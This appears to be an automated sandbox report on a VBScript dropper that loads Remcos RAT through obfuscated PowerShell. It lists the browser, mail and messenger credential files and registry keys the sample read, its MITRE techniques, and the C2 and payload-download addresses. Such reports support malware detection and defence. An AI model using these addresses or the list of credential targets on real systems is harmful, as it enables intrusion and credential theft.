                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5008, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-SACUXXJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)212
                Process Injection                		1
                Software Packing                		2
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter                		Login HookLogin Hook1
                DLL Side-Loading                		1
                Credentials In Files                		129
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets141
                Security Software Discovery                		SSH2
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Virtualization/Sandbox Evasion                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture112
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465862 Sample: SOA.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 10 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49711, 49720, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 17 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.156, 1993, 49721, 49722 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 49723, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        38 conhost.exe 24->38         started        file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SOA.vbs0%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                geoplugin.net1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://103.237.86.2470%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.x0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeli0%Avira URL Cloudsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.0%Avira URL Cloudsafe
                http://103.237.860%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
                http://103.237.86.2470%VirustotalBrowse
                http://103.237.86.247/Frem0%Avira URL Cloudsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                http://103.237.86.247/F0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.xsnP0%Avira URL Cloudsafe
                http://geoplugin.net/json.gprv0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmel0%Avira URL Cloudsafe
                http://www.nirsoft.net0%VirustotalBrowse
                https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://103.2370%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste0%Avira URL Cloudsafe
                http://103.237.0%Avira URL Cloudsafe
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmelig0%Avira URL Cloudsafe
                http://103.237.80%Avira URL Cloudsafe
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                https://www.google.com0%VirustotalBrowse
                http://103.2370%VirustotalBrowse
                http://103.20%Avira URL Cloudsafe
                http://geoplugin.net/json.gpM0%Avira URL Cloudsafe
                http://103.237.86.0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://103.237.0%VirustotalBrowse
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%VirustotalBrowse
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.xsnXRbl0380%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%VirustotalBrowse
                http://103.237H0%Avira URL Cloudsafe
                http://103.21%VirustotalBrowse
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
                http://103.237.86.247/qOreedem137.bin)0%Avira URL Cloudsafe
                https://www.office.com/0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpM0%VirustotalBrowse
                http://geoplugin.net/json.gpa0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpf0%Avira URL Cloudsafe
                http://103.237.80%VirustotalBrowse
                http://www.nirsoft.net/0%VirustotalBrowse
                http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                https://www.office.com/0%VirustotalBrowse
                http://geoplugin.net/json.gpa0%VirustotalBrowse
                http://www.imvu.compData0%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligs0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpf0%VirustotalBrowse
                http://www.imvu.com0%VirustotalBrowse
                http://103.237.86.247/Fremm0%Avira URL Cloudsafe
                103.237.87.1560%Avira URL Cloudsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
                http://103.237.86.20%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpl0%VirustotalBrowse
                http://103.237.86.247/Fremme0%Avira URL Cloudsafe
                http://103.237.86.247/0%Avira URL Cloudsafe
                http://103.237.86.240%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.xs0%Avira URL Cloudsafe
                http://103.237.86.247/Fr0%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligst0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                http://103.237.86.247/qOreedem137.bin0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                http://103.230%Avira URL Cloudsafe
                http://103.237.86.247/Fremmeligste.xsn0%Avira URL Cloudsafe
                http://103.237.86.247/Fre0%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                103.237.87.156true
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/qOreedem137.binfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligste.xsnfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://103.237.86.247/Fremmelipowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligste.xpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comrwab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingthbhvEF08.tmp.14.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E57B000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/Fremmeligste.powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Frempowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.netwab.exe, 0000000E.00000002.2604949604.0000000002DA4000.00000004.00000010.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingaotakbhvEF08.tmp.14.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://deff.nelreports.net/api/report?cat=msnbhvEF08.tmp.14.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gprvwab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligste.xsnPpowershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmelpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligstepowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.comwab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhvEF08.tmp.14.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.8powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvEF08.tmp.14.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.2powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpMwab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Fremmeligste.xsnXRbl038powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237Hpowershell.exe, 00000002.00000002.2570518162.000002848EA98000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhvEF08.tmp.14.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/qOreedem137.bin)wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.office.com/bhvEF08.tmp.14.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gpawab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfwab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gplwab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.compDatawab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://go.micropowershell.exe, 00000002.00000002.2570518162.000002848DF0F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gpmwab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.imvu.comwab.exe, wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=wsbbhvEF08.tmp.14.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.237.86.247/Fremmeligspowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Fremmpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhvEF08.tmp.14.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.2powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Fremmepowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.24powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Fremmeligste.xspowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Frpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Fremmeligstpowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=bingaotbhvEF08.tmp.14.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=bingrmsbhvEF08.tmp.14.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/accounts/serviceloginwab.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.23powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Frepowershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ebuddy.comwab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  103.237.87.156
                  		unknownunknown
                  		133587BGNR-AP2BainandCompanySGtrue
                  178.237.33.50
                  		geoplugin.netNetherlands
                  		8455ATOM86-ASATOM86NLfalse
                  103.237.86.247
                  		unknownunknown
                  		133587BGNR-AP2BainandCompanySGfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1465862
                  Start date and time:2024-07-02 07:48:04 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SOA.vbs
                  Detection:MAL
                  Classification:mal100.phis.troj.spyw.expl.evad.winVBS@19/14@1/3
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 175
                  • Number of non-executed functions: 280
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

